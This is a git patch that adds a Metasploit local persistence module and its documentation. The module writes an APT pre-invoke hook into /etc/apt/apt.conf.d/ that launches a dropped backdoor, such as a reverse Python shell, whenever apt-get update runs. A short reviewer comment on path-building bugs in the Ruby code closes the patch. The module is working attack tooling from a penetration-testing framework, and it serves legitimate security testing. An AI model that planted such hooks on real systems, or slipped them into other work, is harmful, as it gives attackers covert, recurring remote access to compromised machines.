From 38bf99e729e3a09babf3d1779a787a2d40d8b71f Mon Sep 17 00:00:00 2001
From: Aaron Ringo
Date: Sat, 30 Mar 2019 21:57:17 -0500
Subject: [PATCH] Re-add of module after jacking up rebase, with new arches,conditional logic, documentation

---
 .../local/apt_package_manager_persistence.md | 36 +++++++
 .../local/apt_package_manager_persistence.rb | 96 +++++++++++++++++++
 2 files changed, 132 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
 create mode 100644 modules/exploits/linux/local/apt_package_manager_persistence.rb

diff --git a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
new file mode 100644
index 0000000000..9e0480c85a
--- /dev/null
+++ b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md
@@ -0,0 +1,36 @@
+## Apt package manager persistence
+
+This module will run a payload when the package manager is used. No
+handler is ran automatically so you must configure an appropriate
+exploit/multi/handler to connect. Module creates a pre-invoke hook
+for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
+
+### Testing
+
+1. Exploit a box that uses APT
+2. `use linux/local/apt_package_manager_persistence`
+3. `set SESSION `
+4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+5. `exploit`
+
+When the system runs apt-get update the payload will launch. You must set handler accordingly.
+
+### Options
+
+**BACKDOOR_NAME**
+Name of backdoor executable
+
+**HOOKNAME**
+Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/ default is (05new-hook).
+Pre-invoke hooks name syntax is numeric followed by text.
+
+**SESSION**
+The session to run this module on.
+
+### Advanced Options
+
+**WritableDir**
+Writable directory for backdoor default is (/usr/local/bin/)
+
+
+
diff --git a/modules/exploits/linux/local/apt_package_manager_persistence.rb b/modules/exploits/linux/local/apt_package_manager_persistence.rb
new file mode 100644
index 0000000000..3851604f5a
--- /dev/null
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Post::File
+ include Msf::Post::Linux::System
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'APT Package Manager Persistence',
+ 'Description' => %q{
+ This module will run a payload when the package manager is used. No
+ handler is ran automatically so you must configure an appropriate
+ exploit/multi/handler to connect. Module creates a pre-invoke hook
+ for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Aaron Ringo' ],
+ 'Platform' => [ 'linux','unix' ],
+ 'Arch' =>
+ [
+ ARCH_CMD,
+ ARCH_X86,
+ ARCH_X64,
+ ARCH_ARMLE,
+ ARCH_AARCH64,
+ ARCH_PPC,
+ ARCH_MIPSLE,
+ ARCH_MIPSBE
+ ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+ 'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian
+ 'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
+ 'Targets' => [ ['Automatic', {}] ],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('HOOKNAME', [ true, 'Name of hook file to write', '05new-hook' ]),
+ OptString.new('BACKDOOR_NAME', [ true, 'Name of binary to write', 'apthook' ])
+ ])
+
+ register_advanced_options(
+ [
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/usr/local/bin/' ])
+ ])
+ end
+
+ def exploit
+
+ hook_path = "/etc/apt/apt.conf.d/"
+ unless writable? hook_path
+ fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system"
+ end
+ hook_path << datastore['HOOKNAME']
+
+ backdoor_path = datastore['WritableDir']
+ unless writable? backdoor_path
+ fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
+ end
+ backdoor_path << datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
+
+ print_status("Attempting to write hook:")
+ hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} &\"};"
+ write_file(hook_path, hook_script)
+
+ unless exist? hook_path
+ fail_with Failure::Unknown, "Failed to write Hook"
+ end
+ print_status("Wrote #{hook_path}")
+
+ if payload.arch.first == 'cmd'
+ write_file(backdoor_path, payload.encoded)
+ else
+ write_file(backdoor_path, generate_payload_exe)
+ end
+
+ unless exist? backdoor_path
+ fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
+ end
+ print_status("Backdoor uploaded #{backdoor_path}")
+ print_status("Backdoor will run on next Apt update")
+
+ # permissions chosen to reflect common perms in /usr/local/bin/
+ chmod(backdoor_path, 0755)
+
+ end
+end
+
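Review bot: In `exploit`, `backdoor_path << datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)` parses as `(backdoor_path << datastore['BACKDOOR_NAME']) || rand_text_alphanumeric(5..10)`, so the random fallback is dead code, and because BACKDOOR_NAME is registered as required with a default it could never be reached anyway; `backdoor_path << datastore['BACKDOOR_NAME']` states what the code actually does. That `<<` also appends in place to whatever `datastore['WritableDir']` returns, so if the datastore hands back its stored String a second run in the same session appends the name a second time, and a WritableDir set without a trailing slash fuses directory and file name. Building the path into a fresh variable after the `writable?` check, `backdoor_path = File.join(datastore['WritableDir'], datastore['BACKDOOR_NAME'])`, avoids both problems, and `hook_path`, which is mutated the same way by `hook_path << datastore['HOOKNAME']` and would raise FrozenError if the file ever gains `# frozen_string_literal: true`, would benefit from the same `File.join`.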